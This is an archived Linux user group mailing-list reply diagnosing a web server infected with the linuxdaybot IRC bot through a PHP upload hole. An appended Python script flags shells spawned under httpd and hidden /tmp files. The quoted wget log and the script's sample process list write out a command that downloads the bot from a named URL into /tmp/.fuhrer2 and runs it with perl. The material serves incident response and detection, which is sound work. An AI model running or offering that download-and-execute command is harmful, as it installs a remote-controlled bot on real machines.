-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Naresh Narang wrote:
>
> --- Ritesh Raj Sarraf <[EMAIL PROTECTED]> wrote:
> http://maple.phpwebhosting.com/%7Edarkbroked/linuxdaybot.txt
>> => `/tmp/.fuhrer2'
>> Resolving maple.phpwebhosting.com... 70.86.76.34
>> Connecting to
>> maple.phpwebhosting.com[70.86.76.34]:80...
>
> Who is on IP:
>

Who-is report only shows that it's hosted at a colocated server (phpwebhosting) at ThePlanet's datacenters, just like thousands of other websites. What else?

Anyways, one variant of linuxdaybot is known to connect to IRC servers and await further commands from botmasters (which means it'd execute shell commands by spawning sh). Since you got many sh spawns from apache, looks like you got this one.

The other accompanying scripts include linuxdayworm, which tries to find similar exploitable targets (php-upload exploit) on other websites.

Apart from cleaning up / rebuilding, do take a look at whichever php-based application you were hosting, since php script exploits are what this worm looks for. In fact, that maple.phpwebhosting website looks like yet another victim.

Regards,
Manish

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFDh/fp9364pdQFFqARArQMAJ9/Q3k/RhXrwHrkY/AaP0ivTGG18gCgyKRp
XlougrhoWEzdhVP30vIFSNs=
=J1Vn
-----END PGP SIGNATURE-----

_______________________________________________
ilugd mailinglist -- [email protected]
http://frodo.hserus.net/mailman/listinfo/ilugd
Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi
http://www.mail-archive.com/[email protected]/
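The two symptoms Manish points at above (many `sh` spawns under apache, and a payload saved as a dotfile such as `/tmp/.fuhrer2`) can be checked quickly from a process snapshot. The following script is an added example for this thread, not code posted by anyone on the list: it parses `ps -eo pid,ppid,user,comm,args` output, flags shells and interpreters whose ancestry leads back to an httpd worker owned by the web-server account, and lists command lines that reference hidden files directly under `/tmp`. The snapshot, the web-server user names and the httpd process names are constructed assumptions for the demonstration.

```python
"""Triage helper for a compromised web host (added example, not from the thread).

Input is `ps -eo pid,ppid,user,comm,args` output. Two checks are run:
  1. shells/interpreters that descend from an httpd worker owned by the web user
  2. command lines that touch a hidden file directly under /tmp (e.g. /tmp/.fuhrer2)
"""
import re
from dataclasses import dataclass

WEB_USERS = {"apache", "www-data", "nobody"}      # assumed web-server accounts
HTTPD = {"httpd", "apache2"}                      # assumed web-server process names
SHELLS = {"sh", "bash", "dash", "perl", "python"}  # interpreters a bot would drop into
HIDDEN_TMP = re.compile(r"^/tmp/\.[^/]+$")        # dotfile directly under /tmp

# Constructed sample snapshot; the wget/perl lines mirror what the thread describes.
PS_SNAPSHOT = """\
  PID  PPID USER     COMMAND         COMMAND
    1     0 root     init            /sbin/init
 1203     1 root     httpd           /usr/sbin/httpd -k start
 1210  1203 apache   httpd           /usr/sbin/httpd -k start
 1211  1203 apache   httpd           /usr/sbin/httpd -k start
 2301  1210 apache   sh              sh -c cd /tmp; wget http://maple.phpwebhosting.com/%7Edarkbroked/linuxdaybot.txt -O /tmp/.fuhrer2
 2302  2301 apache   perl            perl /tmp/.fuhrer2
 2401  1211 apache   sh              sh -c /usr/bin/uptime
 3001     1 root     sshd            /usr/sbin/sshd
 3002  3001 alice    bash            -bash
"""


@dataclass
class Proc:
    pid: int
    ppid: int
    user: str
    comm: str
    args: str


def parse_ps(text):
    """Parse `ps -eo pid,ppid,user,comm,args` output; the header line is skipped."""
    procs = []
    for line in text.strip().splitlines()[1:]:
        parts = line.split(None, 4)  # args may contain spaces, so split at most 4 times
        if len(parts) < 5:
            continue
        pid, ppid, user, comm, args = parts
        procs.append(Proc(int(pid), int(ppid), user, comm, args))
    return procs


def descends_from_webserver(proc, by_pid):
    """True if some ancestor of proc is an httpd process running as the web user."""
    seen = set()
    cur = by_pid.get(proc.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        if cur.user in WEB_USERS and cur.comm in HTTPD:
            return True
        cur = by_pid.get(cur.ppid)
    return False


def shells_from_webserver(procs):
    """Return shells/interpreters whose ancestry leads back to an httpd worker."""
    by_pid = {p.pid: p for p in procs}
    return [p for p in procs if p.comm in SHELLS and descends_from_webserver(p, by_pid)]


def hidden_tmp_refs(procs):
    """Return (pid, path) pairs for command lines that reference a dotfile under /tmp."""
    refs = []
    for p in procs:
        for tok in p.args.split():
            if HIDDEN_TMP.match(tok):
                refs.append((p.pid, tok))
    return refs


if __name__ == "__main__":
    procs = parse_ps(PS_SNAPSHOT)
    print("Shells spawned under the web server (review each one):")
    for p in shells_from_webserver(procs):
        print(f"  pid={p.pid} ppid={p.ppid} user={p.user} {p.args}")
    print("Hidden /tmp files referenced by running processes:")
    for pid, path in hidden_tmp_refs(procs):
        print(f"  pid={pid} -> {path}")
```

Every shell under httpd is reported, including the harmless-looking `sh -c /usr/bin/uptime`, because the decision of what is legitimate belongs to whoever knows the hosted PHP application; the script only narrows the list. On a live box, feed it the real `ps` output and cross-check the flagged paths against `ls -la /tmp` and the apache access log for the upload request that planted them.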
